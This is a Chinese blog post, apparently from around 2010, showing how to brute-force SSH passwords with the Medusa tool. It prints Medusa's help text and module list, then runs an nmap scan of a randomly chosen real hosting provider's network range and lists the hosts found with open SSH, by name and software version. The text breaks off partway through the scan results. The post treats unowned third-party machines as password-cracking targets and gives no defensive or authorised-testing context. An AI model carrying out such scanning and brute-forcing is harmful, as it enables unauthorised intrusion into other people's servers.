medusa破解ssh密码

From 一不小心高潮了blog

蛋疼，随手写一下，medusa破解起来还是比较快的，首先我们看看帮助

root@perl-exploit:/pentest/exploits/framework3# medusa
Medusa v1.5 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ALERT: Host information must be supplied.

Syntax: Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module [OPT]
-h [TEXT]    : Target hostname or IP address
-H [FILE]    : File containing target hostnames or IP addresses
-u [TEXT]    : Username to test
-U [FILE]    : File containing usernames to test
-p [TEXT]    : Password to test
-P [FILE]    : File containing passwords to test
-C [FILE]    : File containing combo entries. See README for more information.
-O [FILE]    : File to append log information to
-e [n/s/ns] : Additional password checks ([n] No Password, [s] Password = Username)
-M [TEXT]    : Name of the module to execute (without the .mod extension)
-m [TEXT]    : Parameter to pass to the module. This can be passed multiple times with a
                 different parameter each time and they will all be sent to the module (i.e.
                 -m Param1 -m Param2, etc.)
-d           : Dump all known modules
-n [NUM]     : Use for non-default TCP port number
-s           : Enable SSL
-g [NUM]     : Give up after trying to connect for NUM seconds (default 3)
-r [NUM]     : Sleep NUM seconds between retry attempts (default 3)
-R [NUM]     : Attempt NUM retries before giving up. The total number of attempts will be NUM + 1.
-t [NUM]     : Total number of logins to be tested concurrently
-T [NUM]     : Total number of hosts to be tested concurrently
-L           : Parallelize logins using one username per thread. The default is to process
                 the entire username before proceeding.
-f           : Stop scanning host after first valid username/password found.
-F           : Stop audit after first valid username/password found on any host.
-b           : Suppress startup banner
-q           : Display modules usage information
-v [NUM]     : Verbose level [0 - 6 (more)]
-w [NUM]     : Error debug level [0 - 10 (more)]
-V           : Display version
-Z [NUM]     : Resume scan from host #

ok，我们看看medusa有哪些模块支持什么功能的破解

root@perl-exploit:/pentest/exploits/framework3# medusa -d
Medusa v1.5 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

Available modules in "." :

Available modules in "/usr/lib/medusa/modules" :
    + cvs.mod : Brute force module for CVS sessions : version 1.0.0
    + ftp.mod : Brute force module for FTP/FTPS sessions : version 1.3.0
    + http.mod : Brute force module for HTTP : version 1.3.0
    + imap.mod : Brute force module for IMAP sessions : version 1.2.0
    + mssql.mod : Brute force module for M$-SQL sessions : version 1.1.1
    + mysql.mod : Brute force module for MySQL sessions : version 1.2
    + ncp.mod : Brute force module for NCP sessions : version 1.0.0
    + nntp.mod : Brute force module for NNTP sessions : version 1.0.0
    + pcanywhere.mod : Brute force module for PcAnywhere sessions : version 1.0.2
    + pop3.mod : Brute force module for POP3 sessions : version 1.2
    + postgres.mod : Brute force module for PostgreSQL sessions : version 1.0.0
    + rexec.mod : Brute force module for REXEC sessions : version 1.1.1
    + rlogin.mod : Brute force module for RLOGIN sessions : version 1.0.2
    + rsh.mod : Brute force module for RSH sessions : version 1.0.1
    + smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 1.5
    + smtp-vrfy.mod : Brute force module for enumerating accounts via SMTP VRFY : version 1.0.0
    + smtp.mod : Brute force module for SMTP Authentication with TLS : version 1.0.0
    + snmp.mod : Brute force module for SNMP Community Strings : version 1.0.0
    + ssh.mod : Brute force module for SSH v2 sessions : version 1.0.2
    + svn.mod : Brute force module for Subversion sessions : version 1.0.0
    + telnet.mod : Brute force module for telnet sessions : version 1.2.2
    + vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 1.0.1
    + vnc.mod : Brute force module for VNC sessions : version 1.0.1
    + web-form.mod : Brute force module for web forms : version 1.0.0
    + wrapper.mod : Generic Wrapper Module : version 1.0.1

恩，我们要破解ssh，所以用-M ssh参数加载ssh模块，后面不用跟.mod

首先我们确定目标，扫描开放ssh的机器，随便找个段扫描一下吧

root@perl-exploit:/pentest# nmap -sV -p22 -oG ssh 69.163.190.0/24

然后是漫长的等待，上面的参数扫描意思是，扫描整个段开了22端口的机器，并且判断服务版本，保存到ssh文件中。

然后我们查看扫描结果

root@perl-exploit:/pentest# cat ssh
# Nmap 5.00 scan initiated Tue Jun 22 02:18:28 2010 as: nmap -sV -p22 -oG ssh 69.163.190.0/24
Host: 69.163.190.1 (ip-69-163-190-1.dreamhost.com) Ports: 22/closed/tcp//ssh///
Host: 69.163.190.2 (ip-69-163-190-2.dreamhost.com) Ports: 22/closed/tcp//ssh///
Host: 69.163.190.3 (ip-69-163-190-3.dreamhost.com) Ports: 22/closed/tcp//ssh///
Host: 69.163.190.4 (dragich.shaggy.dreamhost.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.5 (myrck.spongebob.dreamhost.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.6 (apache2-twang.luthor.dreamhost.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.7 (ps11591.dreamhost.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.8 (ps10854.dreamhost.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.9 (rangerjill.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.10 (ouellette.yogi.dreamhost.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p1 Debian 5 (protocol 2.0)/
Host: 69.163.190.11 (psmysql11957.dreamhostps.com) Ports: 22/open/tcp//ssh//OpenSSH 4.3p2 Debian 9etch2 (protocol 2.0)/
Host: 69.163.190.12 (rubeo.yogi.dreamhost.com) Ports: 22/open/tcp//ssh//OpenSSH 5.1p